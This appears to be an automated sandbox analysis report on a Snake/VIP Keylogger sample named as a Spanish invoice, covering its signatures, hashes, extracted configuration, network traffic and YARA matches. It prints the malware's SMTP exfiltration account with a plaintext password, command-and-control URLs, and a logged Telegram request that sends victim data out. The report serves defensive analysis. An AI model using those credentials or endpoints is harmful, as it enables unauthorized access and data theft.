Windows Analysis Report
Factura 1-2501377.exe

Overview

General Information

Sample name: Factura 1-2501377.exe
Analysis ID: 1651217
MD5: ba1ba279b7001f7a2062f51e4327b49a
SHA1: 67051fb8047015d225df80754353c95c256a337b
SHA256: 86d4c0b6d645041101606bc402ae23455d0e85fc4894455984d60855351ba2f5
Tags: exeuser-lowmal3

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Sample uses string decryption to hide its real strings
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Classification chart (image not preserved). Axes: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner. Scale: clean, suspicious, malicious.
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection

Source: 00000004.00000002.3340632815.0000000003021000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "ercan.gural@mupa.com.tr", "Password": "$Rc9Ff8y", "Host": "webmail.mupa.com.tr", "Port": "587"}
Source: 00000004.00000002.3340632815.0000000003021000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "ercan.gural@mupa.com.tr", "Password": "$Rc9Ff8y", "Host": "webmail.mupa.com.tr", "Port": "587", "Version": "4.4"}
Source: Factura 1-2501377.exe ReversingLabs: Detection: 38%
Source: Factura 1-2501377.exe Virustotal: Detection: 35%
Source: Submitted Sample Neural Call Log Analysis: 99.3%
Source: 0.2.Factura 1-2501377.exe.471d7b0.3.unpack String decryptor: ercan.gural@mupa.com.tr
Source: 0.2.Factura 1-2501377.exe.471d7b0.3.unpack String decryptor: $Rc9Ff8y
Source: 0.2.Factura 1-2501377.exe.471d7b0.3.unpack String decryptor: webmail.mupa.com.tr
Source: 0.2.Factura 1-2501377.exe.471d7b0.3.unpack String decryptor: garyantonio0934@gmail.com
Source: 0.2.Factura 1-2501377.exe.471d7b0.3.unpack String decryptor: 587
Source: 0.2.Factura 1-2501377.exe.471d7b0.3.unpack String decryptor:

Location Tracking

Source: unknown DNS query: name: reallyfreegeoip.org
Source: Factura 1-2501377.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49693 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: Factura 1-2501377.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then jmp 079F7E42h 0_2_079F7438
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then jmp 0160F45Dh 4_2_0160F2D1
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then jmp 0160F45Dh 4_2_0160F4AC
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then jmp 0160FC19h 4_2_0160F961
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then jmp 05A0D069h 4_2_05A0CDC0
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then jmp 05A0F781h 4_2_05A0F4D8
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then jmp 05A0EED1h 4_2_05A0EC28
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then jmp 05A0EA79h 4_2_05A0E7D0
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then jmp 05A0E1C9h 4_2_05A0DF20
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then jmp 05A03308h 4_2_05A02EE6
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then jmp 05A03308h 4_2_05A02EF0
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then jmp 05A0D919h 4_2_05A0D670
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 4_2_05A00673
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then jmp 05A0FBD9h 4_2_05A0F930
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then jmp 05A0F329h 4_2_05A0F080
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 4_2_05A00040
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 4_2_05A00853
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then jmp 05A00D0Dh 4_2_05A00B30
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then jmp 05A016F8h 4_2_05A00B30
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then jmp 05A0E621h 4_2_05A0E378
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then jmp 05A02D41h 4_2_05A02A90
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then jmp 05A0DD71h 4_2_05A0DAC8
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then jmp 05A03308h 4_2_05A03236
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4x nop then jmp 05A0D4C1h 4_2_05A0D218

Networking

Source: Network traffic Suricata IDS: 2060048 - Severity 1 - ET MALWARE Snake Keylogger Exfil via SMTP (VIP Recovery) : 192.168.2.8:49715 -> 94.199.205.104:587
Source: Network traffic Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.8:49709 -> 149.154.167.220:443
Source: unknown DNS query: name: api.telegram.org
Source: global traffic TCP traffic: 192.168.2.8:49715 -> 94.199.205.104:587
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841618%0D%0ADate%20and%20Time:%2028/03/2025%20/%2021:04:31%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20841618%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 132.226.8.169
Source: Joe Sandbox View IP Address: 149.154.167.220
Source: Joe Sandbox View IP Address: 104.21.32.1
Source: Joe Sandbox View IP Address: 104.21.32.1
Source: Joe Sandbox View ASN Name: AEROTEK-ASTR
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49695 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49692 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49698 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49694 -> 104.21.32.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49702 -> 104.21.32.1:443
Source: global traffic TCP traffic: 192.168.2.8:49715 -> 94.199.205.104:587
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: unknown HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49693 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/45.92.229.138 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841618%0D%0ADate%20and%20Time:%2028/03/2025%20/%2021:04:31%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20841618%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic DNS traffic detected: DNS query: webmail.mupa.com.tr
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Fri, 28 Mar 2025 14:18:34 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: Factura 1-2501377.exe, 00000004.00000002.3340632815.000000000320F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: Factura 1-2501377.exe, 00000000.00000002.885422652.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3338165117.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: Factura 1-2501377.exe, 00000000.00000002.885422652.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3340632815.0000000003021000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3338165117.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: Factura 1-2501377.exe, 00000000.00000002.885422652.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3340632815.0000000003021000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3338165117.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Factura 1-2501377.exe, 00000004.00000002.3340632815.0000000003021000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: Factura 1-2501377.exe, 00000004.00000002.3340632815.0000000003021000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: Factura 1-2501377.exe, 00000000.00000002.885422652.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3338165117.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
Source: Factura 1-2501377.exe, 00000004.00000002.3340632815.0000000003021000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Factura 1-2501377.exe, 00000000.00000002.885422652.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3340632815.0000000003021000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3338165117.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: Factura 1-2501377.exe, 00000004.00000002.3340632815.000000000320F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://webmail.mupa.com.tr
Source: Factura 1-2501377.exe, 00000004.00000002.3338879017.00000000011C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.co
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.0000000004302000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3343087060.000000000433C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org?q=
Source: Factura 1-2501377.exe, 00000004.00000002.3340632815.0000000003106000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: Factura 1-2501377.exe, 00000000.00000002.885422652.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3340632815.0000000003106000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3338165117.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: Factura 1-2501377.exe, 00000004.00000002.3340632815.0000000003106000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Factura 1-2501377.exe, 00000004.00000002.3340632815.0000000003106000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841618%0D%0ADate%20a
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.0000000004302000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3343087060.000000000433C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.0000000004302000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3343087060.000000000433C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.0000000004302000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3343087060.000000000433C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Factura 1-2501377.exe, 00000004.00000002.3340632815.00000000031B3000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3340632815.00000000031E4000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3340632815.00000000031A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: Factura 1-2501377.exe, 00000004.00000002.3340632815.00000000031B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en4
Source: Factura 1-2501377.exe, 00000004.00000002.3340632815.00000000031AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlBDr
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.0000000004302000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3343087060.000000000433C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.0000000004302000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3343087060.000000000433C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.0000000004302000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3343087060.000000000433C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.0000000004302000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3343087060.000000000433C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gemini.google.com/app?q=
Source: Factura 1-2501377.exe, 00000004.00000002.3340632815.0000000003106000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3340632815.000000000306F000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3340632815.00000000030DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: Factura 1-2501377.exe, 00000000.00000002.885422652.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3338165117.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3340632815.000000000306F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: Factura 1-2501377.exe, 00000004.00000002.3340632815.000000000309A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/45.92.229.138
Source: Factura 1-2501377.exe, 00000004.00000002.3340632815.0000000003106000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3340632815.00000000030DF000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3340632815.000000000309A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/45.92.229.138$
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.0000000004302000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3343087060.000000000433C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/v20w
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.0000000004302000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3343087060.000000000433C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: Factura 1-2501377.exe, 00000004.00000002.3340632815.00000000031E4000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3340632815.00000000031D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: Factura 1-2501377.exe, 00000004.00000002.3340632815.00000000031E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/4
Source: Factura 1-2501377.exe, 00000004.00000002.3340632815.00000000031DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lBDr
Source: unknown Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49694
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49693
Source: unknown Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49693 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49709 version: TLS 1.2

System Summary

Source: 4.2.Factura 1-2501377.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.Factura 1-2501377.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.Factura 1-2501377.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Factura 1-2501377.exe.46d9990.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Factura 1-2501377.exe.46d9990.4.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Factura 1-2501377.exe.471d7b0.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Factura 1-2501377.exe.46d9990.4.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Factura 1-2501377.exe.471d7b0.3.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Factura 1-2501377.exe.471d7b0.3.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
